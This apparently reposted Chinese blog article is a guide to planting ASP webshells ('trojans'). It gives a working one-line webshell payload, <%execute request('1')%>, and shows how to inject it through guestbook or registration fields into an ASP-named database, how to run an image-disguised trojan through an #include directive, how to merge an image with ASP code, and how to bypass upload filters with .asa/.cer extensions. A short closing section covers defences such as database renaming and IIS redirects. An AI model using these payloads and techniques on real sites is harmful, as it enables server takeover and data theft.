ASP木马

来源:互联网 发布:mac能打开mpq文件吗 编辑:程序博客网 时间:2024/04/28 15:35

一、木马生成

asp木马代码加密,图片合并,文件时间修改,还有要命的系统漏洞利用

 

图片和木马合并命令:
copy 1.gif /b + asp.asp /a asp.gif

 

二、木马上传

如果后台没有类似数据库备份功能,可以生成新文件,或者直接修改文件。那么很难直接让木马运行,不过还是有一些方法,可以考虑。   
  1、如果后台数据库是以asp格式存储的。那么可以采用在数据库中插入一句话木马(<%execute     request("1")%>),然后利用一句话木马上传一个完整木马。   
  2、如果网站后台允许修改网站联系信息等页面,而且页面也是也是以asp存储,那么可以利用asp的包含文件,巧妙的令jpg、bmp等格式木马得以运行。比如在其中插入   
  <!--   #include   file=/upload/****.jpg   -->   
  3、还可以看看网站上传类型是否有严格的过滤,如果仅仅是限制了asp文件,那么可以尝试上传asa、cer等等。

  
  作为技术性问题,可以这样实现。   
  一般情况下,在留言板、个人注册等地方,需要个人信息。   
  而且在进行个人信息中的个人主页、邮件地址等信息,不会有太严格的过滤。这就为插入一句话木马提供了可能性。   
  举例说明:我给一个网站留言,我在填写我的“个人主页”或者“email”时,不输入真实信息。而输入一句话木马。这样,只要知道了asp数据库地址,那么提交一句话木马后,直接访问asp数据库就可运行木马了。   
  所以,很多人把acess数据库改名为asp以防止下载,岂不知危害照样存在,只不过换了一种方式而已。

  

 

三、如何防护 
  1、是的,对方猜出正确的数据库路径的几率和同一地点被雷集中两次几率几乎相同。但是需要注意的是在写连接数据库文件时,注意防止暴库   
  2、是的,而且如果你的数据库不是以asp存放,那么就无所谓了。   
  3、这个问题有点大。估计网上的讨论也没有停止过,个人认为也没有标准答案。不过,我认为安全是一个整体,必须从多个方面考虑,以分层次防御的方法无疑是一个好办法。   
    
  我自己通常是从两个层次进行防护,其一就是数据库改名(包括文件名和后缀名)最好改为你自己都记不住又长的那种。这样别猜测的可能性降到最低。这是从asp层面进行防护,也是现在最常用,最流行的方法   
  其二,如果你的数据库已经暴露(由于一些别的原因或者未知的漏洞),那么也还是有办法的,这就是第二层防护,从iis层面进行防护(但这有个要求,就是你要具有iis管理权限),方法如下,运用iis的url重定向功能。在iis配置中,将数据库文件永久重定向到某个固定的url(当然,你可以事先在这个url写好一些问候的页面)。这样所有从外部提交的请求都会被送到那个url而你的数据安然无恙,即使别人知道了数据库真实地址,也只能忘库兴叹。

原创粉丝点击